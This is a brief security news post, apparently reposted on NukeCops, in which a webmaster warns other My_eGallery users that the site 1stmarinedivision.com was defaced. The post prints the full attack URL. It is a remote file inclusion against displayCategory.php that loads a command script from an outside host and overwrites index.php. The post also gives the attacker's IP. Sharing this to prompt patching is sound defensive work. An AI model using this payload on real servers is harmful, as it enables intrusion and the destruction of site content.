1stmarinedivision.com Hacked!!
Date: Friday, December 12 @ 23:17:22 CET
Topic: Security


Hello all, just thought that I would make everyone aware that I was hacked last night ...Although no real damage was done this time, I guess I was lucky...The intruder came in on My_eGallery/public/displayCategory.php and then from there he was able to write to my index.php page! They left me a message saying," owned by hidden wrestle porra " .To those that are running the gallery make sure that you have all the correct patches out there so this don't happen to you!
As far as the code and such that was used.... they used the following
::::modules/My_eGallery/public/displayCategory.php?basepath=http://www.dunnmemorial.org/bb/cmd.txt?&cmd=cd%20/home/httpd/vhosts/1stmarinedivision.com/httpdocs;echo%20owned%20by%20hidden%20wrestle%20porra%20>%20index.php:::::::
Also, please make note of his Ip 200.221.163.230 and make sure to ban them !
........................Hue http://www.1stmarinedivision.com
1St. To Excel
1St. To Succeed
1St. Marine



Haven't checked this, but here is an exploit for my_egallery. A fix is also available via that link to: sourceforge.



This article comes from NukeCops
http://www.nukecops.com

The URL for this story is:
http://www.nukecops.com/modules.php?name=News&file=article&sid=1159